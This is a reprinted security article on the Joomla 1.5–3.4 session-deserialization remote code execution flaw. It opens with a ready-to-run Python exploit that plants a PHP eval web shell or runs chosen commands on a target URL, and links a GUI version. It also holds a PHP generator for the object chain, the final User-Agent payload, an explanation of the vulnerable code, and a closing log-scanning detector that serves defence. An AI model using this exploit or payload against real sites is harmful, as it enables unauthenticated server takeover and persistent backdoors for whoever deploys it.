"Reprint" Joomla Remote Code Execution Vulnerability Analysis

Source: Internet
Author: User

Script usage:

    python jj.py http://123.123.123.123             (drops a shell directly)
    python jj.py http://123.123.123.123 "whoami"    (executes a command)

The exp script (Python 2, as published; it relies on urllib2/cookielib):

    #author:we8i&90sec
    import urllib2, urllib, base64
    import cookielib, sys, re

    cj = cookielib.CookieJar()
    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
    urllib2.install_opener(opener)
    urllib2.socket.setdefaulttimeout(10)

    if len(sys.argv) == 2:
        # no command given: write mail.php under the document root
        values = {'111': base64.b64encode('$myfile = fopen($_SERVER["DOCUMENT_ROOT"]."/mail.php","w+") or die("cctv321"); fwrite($myfile,"<?php @eval(\$_POST[we8i]);?>"); fclose($myfile); echo "cctv123";')}
    elif len(sys.argv) == 3:
        # command given: run it and wrap its output in <sb> tags
        values = {'111': base64.b64encode('echo "cctvcmd<sb>"; system("' + sys.argv[2] + '"); echo "</sb>";')}

    # serialized object chain injected after the "|", terminated by the U+1D306 character (\xf0\x9d\x8c\x86)
    ua = '}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\x5c0\x5c0\x5c0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:60:"eval(base64_decode($_POST[111]));JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\x5c0\x5c0\x5c0connection";b:1;}\xf0\x9d\x8c\x86'

    # first request: the User-Agent is written into the session table
    req = urllib2.Request(url=sys.argv[1], headers={'User-Agent': ua})
    opener.open(req)

    # second request: the stored session is read back and deserialized
    data = urllib.urlencode(values)
    req = urllib2.Request(sys.argv[1], data)
    comeback = opener.open(req).read()

    if 'cctv123' in comeback:
        print "shellurl:" + sys.argv[1] + "/mail.php"
        print "ps:if the shell url wrong try http://webUrlRoot/mail.php"
    elif 'cctv321' in comeback:
        print "The command can work,but the path maybe can not write!"
    elif 'cctvcmd' in comeback:
        cmd = re.findall("<sb>(.*)</sb>", comeback, re.S)
        for x in cmd:
            print x

A .NET GUI version is also attached. It is not very stable, so when getting a shell try a few more times.

Download link: http://pan.baidu.com/s/1nu0tqHz

Vulnerability Analysis

Let's talk about the impact of this vulnerability, how it is triggered and how it is exploited. It affects every Joomla version from 1.5 to 3.4, and exploitation requires no login: only two requests need to be sent (the first writes the session into the database; the second sends the same packet, which reads the session back out, triggers the vulnerability and executes arbitrary code). The consequence is direct arbitrary code execution.

0x00 Vulnerable point: session deserialization

The vulnerability lies in the process of deserializing the session.

The vulnerable code is the _validate function in libraries/joomla/session/session.php: the User-Agent and X-Forwarded-For headers are stored into the session through the set method (as session.client.browser and session.client.forwarded):

    protected function _validate($restart = false)
    {
        ...
        // Record proxy forwarded for in the session in case we need it later
        if (isset($_SERVER['HTTP_X_FORWARDED_FOR']))
        {
            $this->set('session.client.forwarded', $_SERVER['HTTP_X_FORWARDED_FOR']);
        }
        ...
        // Check for clients browser
        if (in_array('fix_browser', $this->_security) && isset($_SERVER['HTTP_USER_AGENT']))
        {
            $browser = $this->get('session.client.browser');

            if ($browser === null)
            {
                $this->set('session.client.browser', $_SERVER['HTTP_USER_AGENT']);
            }
            elseif ($_SERVER['HTTP_USER_AGENT'] !== $browser)
            {
                // @todo remove code: $this->_state = 'error';
                // @todo remove code: return false;
            }
        }
        ...

Both values eventually end up in the database, in the session table:

Under normal circumstances this is not a problem: we control only a single string inside the deserialized object, so no deserialization-related vulnerability is triggered. However, thanks to a small trick, we can later control the entire deserialized object.

0x01 Using the | character to forge and control the entire deserialized string

First, take a look at @ryat's pch-013: https://github.com/80vul/phpcodz/blob/master/research/pch-013.md

Similar to the situation in pch-013, Joomla does not use PHP's own session handling mechanism; instead it implements its own session storage containers in several ways (database, memcache, etc.).

The storage format is "key name + vertical bar + value processed by serialize()", which is deserialized on read, and multiple vertical bars are not handled correctly.

So if we inject a "|" character here, everything before it is treated as the key name, and after the "|" we can insert an arbitrary serialized string to construct a deserialization vulnerability.

But there is another problem: after we have constructed the deserialized string, the original content that follows it must be truncated. Unlike SQL injection, there is no comment syntax available here. You may remember the WordPress XSS from the same period, which used the "%f0%9d%8c%86" character to truncate a MySQL utf-8 field when inserting into the database.

Here we use the same method to truncate the rest of the session as it is written into the database, so that it has no effect on our deserialization.

0x02 Constructing a POP chain to execute arbitrary code

Once we can control the deserialized object, we only need to construct a chain of calls that can be invoked step by step to perform dangerous operations. The exp constructs its execution chain using the following two classes:

    1. JDatabaseDriverMysqli

    2. SimplePie

We can find a sensitive operation in the destructor of the JDatabaseDriverMysqli class:

    public function __destruct()
    {
        $this->disconnect();
    }
    ...
    public function disconnect()
    {
        // Close the connection.
        if ($this->connection)
        {
            foreach ($this->disconnectHandlers as $h)
            {
                call_user_func_array($h, array( &$this));
            }

            mysqli_close($this->connection);
        }

        $this->connection = null;
    }

When the exp object is deserialized it becomes a JDatabaseDriverMysqli object; regardless of what executes in between, __destruct is eventually called, __destruct calls disconnect, and disconnect contains a sensitive function: call_user_func_array.

But obviously the second parameter of this call_user_func_array is not under our control, so we cannot construct assert+eval directly to execute arbitrary code.
So another object is brought in: a SimplePie object, whose init method forms the callback [new SimplePie(), 'init'] that is passed into call_user_func_array. Following the init method:

    function init()
    {
        // Check absolute bare minimum requirements.
        if ((function_exists('version_compare') && version_compare(PHP_VERSION, '4.3.0', '<')) || !extension_loaded('xml') || !extension_loaded('pcre'))
        {
            return false;
        }
        ...
        if ($this->feed_url !== null || $this->raw_data !== null)
        {
            $this->data = array();
            $this->multifeed_objects = array();
            $cache = false;

            if ($this->feed_url !== null)
            {
                $parsed_feed_url = SimplePie_Misc::parse_url($this->feed_url);

                // Decide whether to enable caching
                if ($this->cache && $parsed_feed_url['scheme'] !== '')
                {
                    $cache = call_user_func(array($this->cache_class, 'create'), $this->cache_location, call_user_func($this->cache_name_function, $this->feed_url), 'spc');
                }

Obviously, these two call_user_func calls are the culprits that trigger code execution. So I set cache_name_function, the first parameter of the second call_user_func, to assert, and its second parameter (feed_url) to the code I want to execute, and a "callback backdoor" is constructed.

So how is the exp generated? Here is the generator code I wrote:

    <?php
    header("Content-type: text/plain");

    class JSimplepieFactory {}
    class JDatabaseDriverMysql {}

    class SimplePie
    {
        var $sanitize;
        var $cache;
        var $cache_name_function;
        var $javascript;
        var $feed_url;

        function __construct()
        {
            $this->feed_url = "phpinfo();JFactory::getConfig();exit;";
            $this->javascript = 9999;
            $this->cache_name_function = "assert";
            $this->sanitize = new JDatabaseDriverMysql();
            $this->cache = true;
        }
    }

    class JDatabaseDriverMysqli
    {
        protected $a;
        protected $disconnectHandlers;
        protected $connection;

        function __construct()
        {
            $this->a = new JSimplepieFactory();
            $x = new SimplePie();
            $this->connection = 1;
            $this->disconnectHandlers = [
                [$x, "init"],
            ];
        }
    }

    $a = new JDatabaseDriverMysqli();
    echo serialize($a);

The exp generated by this code is injected after the "|" in the User-Agent, as described above, and triggers code execution. Note that we need to replace chr(0).'*'.chr(0) with \0\0\0, because when a protected property is serialized it becomes \0*\0name, and the reverse substitution can be seen in the source code:

    $result = str_replace('\0\0\0', chr(0) . '*' . chr(0), $result);

The construction has one small complication: by default the SimplePie class is not defined, which is why I create a JSimplepieFactory before instantiating SimplePie. When the JSimplepieFactory object is loaded it calls the import function, which imports SimplePie into the current environment:

And JSimplepieFactory is autoloaded, so no other include is needed to load it. Here is the final constructed POC (the POC generated by the PHP code above):

    User-Agent: 123}__test|O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";s:37:"phpinfo();JFactory::getConfig();exit;";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}𝌆

The POC executing code successfully:

0x03 Affected versions & fix

All versions from 1.5 to 3.4

Update to version 3.4.6
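As an added example (not part of the original article or of the exp above), the following Python 3 check flags the request-header patterns described in sections 0x01 and 0x02 when run over web-server logs: a "|" followed by a serialized PHP value, the gadget class names used by the chain, and a 4-byte UTF-8 character of the kind used to truncate the stored session. The sample requests are constructed, not real traffic.

```python
import re

# Constructed sample requests (not real traffic): one benign header,
# two carrying the markers described in sections 0x01 and 0x02.
SAMPLE_REQUESTS = [
    {"ip": "198.51.100.7", "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) Firefox/42.0"},
    {"ip": "203.0.113.9", "User-Agent": 'x}__test|O:21:"JDatabaseDriverMysqli":3:{s:4:"\\0\\0\\0a";O:17:"JSimplepieFactory":0:{}}\U0001d306'},
    {"ip": "203.0.113.9", "X-Forwarded-For": '1.1.1.1|O:9:"SimplePie":1:{s:8:"feed_url";s:3:"abc";}'},
]

# A "|" followed by a serialized PHP object or array header, e.g. |O:21:
SERIALIZED_AFTER_PIPE = re.compile(r'\|(?:O|a):\d+:')
# Class names of the chain walked through in section 0x02.
GADGET_CLASSES = ("JDatabaseDriverMysqli", "SimplePie", "JSimplepieFactory")
# Headers that the vulnerable _validate function copies into the session.
WATCHED_HEADERS = ("User-Agent", "X-Forwarded-For")


def inspect_header(value):
    """Return the reasons a header value looks like session injection (empty if none)."""
    reasons = []
    if SERIALIZED_AFTER_PIPE.search(value):
        reasons.append("pipe followed by serialized PHP value")
    found = [c for c in GADGET_CLASSES if c in value]
    if found:
        reasons.append("gadget class name: " + ", ".join(found))
    # Code points above U+FFFF are 4-byte UTF-8; MySQL `utf8` columns cut the
    # row off at the first one, which is how section 0x01 drops the session tail.
    if any(ord(ch) > 0xFFFF for ch in value):
        reasons.append("4-byte UTF-8 character (MySQL utf8 truncation)")
    return reasons


def scan(requests):
    """Return (ip, header name, reasons) for every watched header that looks malicious."""
    hits = []
    for req in requests:
        for name in WATCHED_HEADERS:
            if name in req:
                reasons = inspect_header(req[name])
                if reasons:
                    hits.append((req["ip"], name, reasons))
    return hits


if __name__ == "__main__":
    for ip, header, reasons in scan(SAMPLE_REQUESTS):
        print("%s %s: %s" % (ip, header, "; ".join(reasons)))
```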

Reprinted from 360 Security Broadcast; exp and article collected by Blck.
